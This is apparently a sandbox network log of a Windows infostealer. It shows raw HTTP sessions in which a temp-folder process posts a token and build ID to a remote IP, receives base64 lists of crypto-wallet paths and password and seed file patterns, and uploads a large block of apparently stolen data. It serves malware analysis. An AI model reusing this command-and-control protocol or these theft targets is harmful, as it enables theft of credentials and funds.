                                                          2024-05-26 22:28:27 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                          Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                          2024-05-26 22:28:27 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                          Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.54976665.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:29 UTC279OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 1145
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:29 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DAKEHIJJKEGIDHIEHDAFCont
                                                          2024-05-26 22:28:30 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.54976765.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:30 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:30 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IEHIIIJDAAAAAAKECBFBCont
                                                          2024-05-26 22:28:31 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:31 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.54976865.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:32 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IEBAAFCAFCBKFHJJJKKFCont
                                                          2024-05-26 22:28:33 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.54976965.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:34 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HDBKFHIJKJKECAAAECAECont
                                                          2024-05-26 22:28:35 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:35 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                          Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.54977065.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:36 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFB
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 453
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:36 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KECFIDGCBFBAKEBFBKFBCont
                                                          2024-05-26 22:28:37 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.54977165.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:38 UTC281OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 112837
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DGDAEHCBGIIJJJJKKKEHCont
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 50 2f 41 50 45 56 54 78 47 44 35 50 5a 38 79 73 64 53 77 2b 4d 35 2f 61 63 72 75 61 48 67 37 78 42 4e 63 33 65 6c 61 46 65 35 4e 7a 5a 58 62 6d 4e 75 75 55 45 4d 6f 49 4a 39 69 51 50 70 39 4b 70 2b 4e 2f 38 41 6b 62 62 76 2f 64 6a 2f 41 50 51 46 72 55 38 4c 2b 41 64 57 30 58 78 48 61 61 6a 64 58 46 6d 38 55 4f 2f 63 49 33 63 74 79 68 55 59 79 6f 39 52 33 72 4c 38 62 2f 38 41 49 32 33 6e 30 6a 2f 39 41 57 75 57 69 36 55 73 63 6e 53 64 31 5a 2f 66 71 61 59 78 56 59 35 63 31 56 56 6e 7a 4c 37 74 44 6e 71 53 6c 6f 72 32 6a 35 6f 53 69 6c 70 4b 59 47 70 34 62 2f 35 47 58 54 66 2b 76 68 50 35 31 30 6e 6a 37 78 44 50 6f 32 70 58 56 72 61 35 53 61 39 73 6f 56 38 30 48 37 69 71 38 32 63 65 35 33 44 39 61 35 76 77 35 2f 79 4d 75 6d 2f 39 66 4b 66 7a 72 72 76 47 76
                                                          Data Ascii: P/APEVTxGD5PZ8ysdSw+M5/acruaHg7xBNc3elaFe5NzZXbmNuuUEMoIJ9iQPp9Kp+N/8Akbbv/dj/APQFrU8L+AdW0XxHaajdXFm8UO/cI3ctyhUYyo9R3rL8b/8AI23n0j/9AWuWi6UscnSd1Z/fqaYxVY5c1VVnzL7tDnqSlor2j5oSilpKYGp4b/5GXTf+vhP510nj7xDPo2pXVra5Sa9soV80H7iq82ce53D9a5vw5/yMum/9fKfzrrvGv
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 67 63 54 6f 6d 2b 69 2f 77 43 44 39 35 36 4c 7a 4c 43 4e 79 6c 79 39 58 70 62 66 61 33 33 45 6c 76 65 50 5a 61 76 71 6d 6d 53 53 36 65 6b 75 6c 36 57 54 4e 64 33 55 48 6e 52 69 35 4d 30 51 62 6a 59 35 49 55 48 59 50 6c 50 63 39 7a 56 6e 54 39 52 48 6b 32 62 79 33 4f 69 4f 31 78 72 4c 32 37 72 39 69 35 76 45 45 63 52 45 63 4a 4d 51 45 5a 4a 59 67 46 6a 47 41 57 7a 6d 73 2b 54 54 62 6d 61 61 39 6e 6b 75 56 61 61 2b 79 4c 70 2f 4c 58 39 36 43 77 63 6a 47 4f 4f 56 42 34 78 30 71 64 4c 65 39 74 59 31 69 73 35 37 65 4b 4a 5a 54 4d 6d 36 31 69 64 34 35 43 41 43 36 4f 79 6c 6b 62 43 6a 6c 53 4f 67 72 4e 34 48 46 75 4f 72 31 30 2f 4f 37 4e 59 35 6e 67 56 4e 4a 52 73 6c 66 38 72 49 6f 44 58 72 33 54 64 4e 30 7a 79 62 47 31 6b 6b 75 49 70 4c 69 34 4e 31 45 6b 78 4a
                                                          Data Ascii: gcTom+i/wCD956LzLCNyly9Xpbfa33ElvePZavqmmSS6ekul6WTNd3UHnRi5M0QbjY5IUHYPlPc9zVnT9RHk2by3OiO1xrL27r9i5vEEcREcJMQEZJYgFjGAWzms+TTbmaa9nkuVaa+yLp/LX96CwcjGOOVB4x0qdLe9tY1is57eKJZTMm61id45CAC6OylkbCjlSOgrN4HFuOr10/O7NY5ngVNJRslf8rIoDXr3TdN0zybG1kkuIpLi4N1EkxJ
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 55 55 55 47 67 59 55 55 67 6f 4e 4d 41 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 4e 4d 41 6f 6f 6f 70 6a 45 6f 6f 4e 46 41 42 52 53 55 74 41 77 6f 70 4b 57 67 41 70 4b 4b 4b 59 43 30 5a 70 4b 53 67 43 53 49 2f 76 55 2f 33 68 2f 4f 74 2b 38 50 2b 6d 53 2f 57 75 66 54 2f 57 4c 2f 41 4c 77 72 66 76 50 2b 50 75 54 36 2f 77 42 4b 35 36 76 78 6f 53 2b 49 68 6f 70 4b 51 31 4a 6f 4c 52 53 55 55 79 67 4e 4c 53 55 5a 6f 45 4c 53 55 55 55 44 43 69 69 69 6d 41 75 61 4d 38 30 32 6c 39 36 51 57 48 5a 39 52 52 6b 47 6d 30 55 57 46 59 69 76 76 2b 51 66 4a 2f 76 4c 56 58 54 50 76 53 2f 51 56 5a 76 54 2f 77 41 53 2b 62 36 72 2f 4f 71 75 6d 48 35 35 50 6f 4b 75 50 77 4d 44 53 78 51 4d 2b 6c 47 61 4d 31 6d 49 57 69 67 48 32 70 63 30 41 4a 6a 69 69 6c 7a
                                                          Data Ascii: UUUGgYUUgoNMAooooAKSlpDQMKKKKACkooNMAooopjEooNFABRSUtAwopKWgApKKKYC0ZpKSgCSI/vU/3h/Ot+8P+mS/WufT/WL/ALwrfvP+PuT6/wBK56vxoS+IhopKQ1JoLRSUUygNLSUZoELSUUUDCiiimAuaM802l96QWHZ9RRkGm0UWFYivv+QfJ/vLVXTPvS/QVZvT/wAS+b6r/OqumH55PoKuPwMDSxQM+lGaM1mIWigH2pc0AJjiilz
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 2f 41 4d 6e 49 76 38 61 39 65 41 41 47 41 4d 41 64 42 56 50 56 4e 54 68 30 6d 79 4e 31 4d 6b 73 67 33 4b 69 78 78 4c 6c 33 59 6e 41 41 47 52 58 79 6a 7a 44 47 4a 58 64 56 2f 64 48 2f 41 4f 52 50 30 4b 4f 56 35 5a 4f 58 4c 44 43 52 31 32 39 36 70 2f 38 41 4a 6e 6c 6a 65 47 2f 46 53 71 57 4f 67 6e 41 47 65 4c 75 49 6e 38 73 31 6e 52 79 4d 7a 76 46 4c 45 38 4d 38 5a 32 79 52 53 44 44 49 66 63 56 37 56 5a 33 63 4e 2f 5a 51 58 64 75 32 36 47 5a 42 49 68 39 69 4d 31 7a 48 6a 54 77 71 4e 56 74 32 31 4f 77 41 6a 31 53 42 63 38 44 69 64 52 2f 41 66 66 30 50 2b 52 74 51 7a 58 45 30 35 4b 64 53 58 50 48 71 72 4c 37 31 5a 49 35 38 54 6b 4f 41 78 4d 48 52 70 55 31 52 71 64 47 6e 4e 71 2f 61 53 6c 4b 57 6a 37 72 56 62 36 72 51 38 2f 6f 71 4b 31 6e 46 31 61 78 7a 41 59
                                                          Data Ascii: /AMnIv8a9eAAGAMAdBVPVNTh0myN1Mksg3KixxLl3YnAAGRXyjzDGJXdV/dH/AORP0KOV5ZOXLDCR1296p/8AJnljeG/FSqWOgnAGeLuIn8s1nRyMzvFLE8M8Z2yRSDDIfcV7VZ3cN/ZQXdu26GZBIh9iM1zHjTwqNVt21OwAj1SBc8DidR/Aff0P+RtQzXE05KdSXPHqrL71ZI58TkOAxMHRpU1RqdGnNq/aSlKWj7rVb6rQ8/oqK1nF1axzAY
                                                          2024-05-26 22:28:38 UTC16355OUTData Raw: 32 53 78 58 6b 64 38 35 75 70 68 4d 38 6b 6b 5a 4a 52 63 71 71 41 49 4d 6e 67 44 4f 54 79 65 6d 4f 69 6f 72 68 72 59 4f 6e 57 6b 70 54 36 48 67 59 58 4d 61 32 47 67 34 55 2b 70 67 54 77 54 41 52 72 6f 2b 6e 53 36 66 74 31 43 50 55 48 4d 39 78 35 77 5a 34 38 37 45 58 43 72 68 41 57 59 34 4f 53 63 6a 6e 69 6e 46 4a 49 4a 37 56 74 4d 30 69 61 32 69 6a 31 4f 48 55 5a 34 35 62 72 7a 50 4d 4d 5a 4a 57 4e 54 73 47 31 52 75 62 72 75 50 49 35 34 72 64 6f 72 44 2b 7a 4b 48 39 66 4c 2f 4a 48 56 2f 62 75 4b 38 76 75 39 66 38 41 4e 6e 4c 33 75 6b 47 39 30 2b 57 77 73 37 47 61 30 74 35 5a 68 63 54 47 34 6e 45 30 6b 6a 6a 49 55 42 67 69 41 4b 4e 7a 63 59 7a 6b 38 6b 38 59 74 53 32 37 33 4e 37 72 56 78 65 61 62 4e 4a 62 36 74 4f 73 37 77 77 33 4f 79 53 4a 31 4c 62 53 72
                                                          Data Ascii: 2SxXkd85uphM8kkZJRcqqAIMngDOTyemOiorhrYOnWkpT6HgYXMa2Gg4U+pgTwTARro+nS6ft1CPUHM9x5wZ487EXCrhAWY4OScjninFJIJ7VtM0ia2ij1OHUZ45brzPMMZJWNTsG1RubruPI54rdorD+zKH9fL/JHV/buK8vu9f8ANnL3ukG90+Wws7Ga0t5ZhcTG4nE0kjjIUBgiAKNzcYzk8k8YtS273N7rVxeabNJb6tOs7ww3OySJ1LbSr
